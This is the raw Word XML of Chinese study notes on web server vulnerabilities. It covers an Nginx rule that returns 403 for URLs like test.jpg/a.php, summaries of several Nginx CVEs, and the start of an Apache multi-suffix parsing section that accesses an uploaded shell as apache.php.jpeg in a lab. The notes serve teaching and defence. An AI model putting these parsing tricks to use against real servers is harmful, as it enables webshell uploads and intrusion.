          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>添加配置，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置文件中添加如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DB396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意为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>当匹配到类似test.jpg/a.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>时，将返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>403</w:t>
      </w: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错误代码。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235891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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">if ( $fastcgi_script_name ~ ..*/.*php ) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD845E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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">return 403; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FEFBB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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020AC5C4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bookmarkStart w:id="7" w:name="_Toc8396"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9.4 Nginx本身的漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(了解不多)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7251AB78" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl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针对Nginx的漏洞修复，通常所说的Nginx固定版本漏洞，是指在Nginx自身程序代码中存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422C0E6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的设计缺陷或程序错误，这类漏洞通常只会影响特定版本的 Nginx。为修复这些固有漏洞，一般按</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F32A23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照官方发布的补丁进行及时更新，或者直接升级到更高版本的Nginx以获得安全增强和功能改进。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44854B41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 Nginx的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DNS</w:t>
      </w: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解析漏洞（CVE-2021-23017）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A4D674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Nginx在处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>响应时，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ngx_resolver_copy()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>off-byone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>越界写入错误， 将允许</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C3F1C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攻击者在堆分配的缓冲区中写入超出边界的点字符('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, 0x2E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)。配置解析程序原语时，响应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562091F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服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>请求的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>响应可能会触发该漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8C0BF1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通过使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0x2E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>构造的数据包覆盖下一个堆块元数据的最低有效字节，从而导致能向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B2EF4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务器提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>响应的攻击者可实现拒绝服务攻击或远程代码执行攻击。由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中缺少</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>欺骗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5092184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防御措施，且在检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>事务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>之前调用了易受攻击的函数，因此攻击者可通过在可行时间内向</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBA89C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目标服务器发送恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">响应来利用漏洞实施攻击。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0244684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/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>简而言之，攻击者可以通过点字符0x2E来覆盖下一个堆块的元数据，构造恶意的DNS响应来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1561C64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FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>触发漏洞，并在目标系统上执行任意代码。受影响Nginx版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0.6.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.20.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6300AB79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 xml:space="preserve">② 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CVE-2019-9511</w:t>
      </w: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，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CVE-2019-9513</w:t>
      </w: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，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CVE-2019-9516</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF2058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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx1.9.51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>16.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.17.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTTP/2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实现中存在拒绝服务漏洞，攻击者以多个数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E488C3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据流请求特定资源上的大量数据，通过操纵窗口大小和流优先级，强迫服务器将数据排列在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2037CEF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的块中，导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 及内存资源耗尽，造成拒绝服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180B5098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 xml:space="preserve">③ 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CVE-2018-16844</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051F848E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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx1.15.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>之前和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTTP/2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实现过程中存在安全漏洞。远程攻击者可通过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252CEAF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发送恶意的请求利用该漏洞造成拒绝服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473DF199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④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CVE-2018-16843</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A5074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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx 1.15.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>之前版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTTP/2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 实现过程中存在安全漏洞。攻击者可利用该漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D2BC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洞消耗大量的内存空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4A578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⑤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CVE-2018-16845</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466CA6F6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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx 1.15.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>及之前和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ngx_http_mp4_module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>组件存在内存泄露漏洞，该</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E185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漏洞源于程序没有正确处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MP4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件。 远程攻击者可利用该漏洞获取敏感信息或造成拒绝服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0792F3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⑥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CVE-2017-20005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D3E9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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx1.13.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>之前存在安全漏洞，该漏洞源于当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>autoindex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模块遇到这个文件时，会导致一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077A15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个整数溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38756910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0B4C585E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0AE6C18E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519C08ED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6A0F499B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6787B385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5BFEEAF4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5D887339" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:before="100" w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0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8" w:name="_Toc14907"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>十、</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web服务器之Apache漏洞（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>面试常问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）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B930B7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10.1 Apache的3个漏洞示例（针对所有版本）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EC29C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 Apache多后缀名解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CCA441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漏洞原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C61354" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="0" w:lineRule="atLeast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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="181865D7" wp14:editId="7B07A113">
            <wp:extent cx="5972810" cy="2953385"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
            <wp:docPr id="119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图片 19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03C7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参考：</w:t>
      </w:r>
      <w:hyperlink r:id="rId140" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://vulhub.org/#/environments/httpd/apache_parsing_vulnerability/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B7C1E28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漏洞复现：启动实验容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739DD392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Fonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问如下文件路径：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://192.168.1.9/uploadfiles/apache.php.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA8F9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访问上传的shell成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF33798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6EBB4A0A" wp14:editId="22145074">
            <wp:extent cx="5971540" cy="1094740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="119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图片 18"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
